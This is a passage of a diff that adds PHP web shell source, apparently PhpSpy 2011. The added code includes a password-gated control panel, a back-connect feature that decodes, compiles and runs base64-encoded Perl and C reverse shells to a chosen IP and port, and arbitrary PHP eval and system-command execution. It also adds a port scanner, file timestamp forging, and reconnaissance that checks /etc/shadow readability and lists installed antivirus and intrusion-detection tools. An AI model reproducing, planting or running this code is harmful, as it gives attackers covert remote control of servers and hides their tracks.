+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','mysqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center">&nbsp;</td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'&nbsp;</td>');
+					p('<td>'.$table['Update_time'].'&nbsp;</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
+					p('</tr>');
+				}
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end mysql
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end
+
+elseif ($action == 'portscan') {
+	!$scanip && $scanip = '127.0.0.1';
+	!$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
+	formhead(array('title'=>'Port Scan'));
+	makehide('action','portscan');
+	p('<p>');
+	p('IP:');
+	makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
+	p('Port:');
+	makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
+	makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	if ($startscan) {
+		p('<h2>Result &raquo;</h2>');
+		p('<ul class="info">');
+		foreach(explode(',', $scanport) as $port) {
+			$fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1); 
+			if (!$fp) {
+				p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
+		   } else {
+				p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
+				@fclose($fp);
+		   } 
+		}
+		p('</ul>');
+	}
+}
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+	
+	goback();
+
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone folder/file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+	goback();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+elseif ($action == 'secinfo') {
+	
+	secparam('Server software', @getenv('SERVER_SOFTWARE'));
+	secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
+	secparam('Open base dir', @ini_get('open_basedir'));
+	secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+	secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+	secparam('cURL support', function_exists('curl_version')?'enabled':'no');
+	$temp=array();
+	if(function_exists('mysql_get_client_info'))
+		$temp[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$temp[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$temp[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$temp[] = "Oracle";
+	secparam('Supported databases', implode(', ', $temp));
+	
+	if( !IS_WIN ) {
+		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+		secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
+		secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
+		secparam('OS version', @file_get_contents('/proc/version'));
+		secparam('Distr name', @file_get_contents('/etc/issue.net'));
+		$safe_mode = @ini_get('safe_mode');
+		if(!$GLOBALS['safe_mode']) {
+			$temp=array();
+			foreach ($userful as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Userful', implode(', ',$temp));
+			$temp=array();
+			foreach ($danger as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Danger', implode(', ',$temp));
+			$temp=array();
+			foreach ($downloaders as $item) 
+				if(which($item)){$temp[]=$item;}
+			secparam('Downloaders', implode(', ',$temp));
+			secparam('Hosts', @file_get_contents('/etc/hosts'));
+			secparam('HDD space', execute('df -h'));
+			secparam('Mount options', @file_get_contents('/etc/fstab'));
+		}
+	} else {
+		secparam('OS Version',execute('ver'));
+		secparam('Account Settings',execute('net accounts'));
+		secparam('User Accounts',execute('net user'));
+		secparam('IP Configurate',execute('ipconfig -all'));
+	}
+}//end
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Powered by <a title="Build 20110419" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function secparam($n, $v) {
+	$v = trim($v);
+	if($v) {
+		p('<h2>'.$n.' &raquo;</h2>');
+		p('<div class="infolist">');
+		if(strpos($v, "\n") === false)
+			p($v.'<br />');
+		else
+			p('<pre>'.$v.'</pre>');
+		p('</div>');
+	}
+}
+function m($msg) {
+	echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
+	$key = ($prefix ? $cookiepre : '').$key;
+	$life = $life ? $life : $cookielife;
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="action" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+function dirsize($dir) { 
+	$dh = @opendir($dir);
+	$size = 0;
+	while($file = @readdir($dh)) {
+		if ($file != '.' && $file != '..') {
+			$path = $dir.'/'.$file;
+			$size += @is_dir($path) ? dirsize($path) : @filesize($path);
+		}
+	}
+	@closedir($dh);
+	return $size;
+}
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//Á¬½ÓMYSQLÊý¾Ý¿â
+function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	global $charsetdb;
+	@ini_set('mysql.connect_timeout', 5);
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if($charset && in_array(strtolower($charset), $charsetdb)) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ³ýĿ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+// »ñµÃÎļþÀ©Õ¹Ãû
+function getext($file) {
+	$info = pathinfo($file);
+	return $info['extension'];
+}
+
+function GetWDirList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=$dir;
+					$dirdata[$j]['server_link']=$f;
+					$j++;
+				}
+				GetWDirList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function GetWFileList($dir){
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getext($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetWFileList($f);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				if (is_writable($f)) {
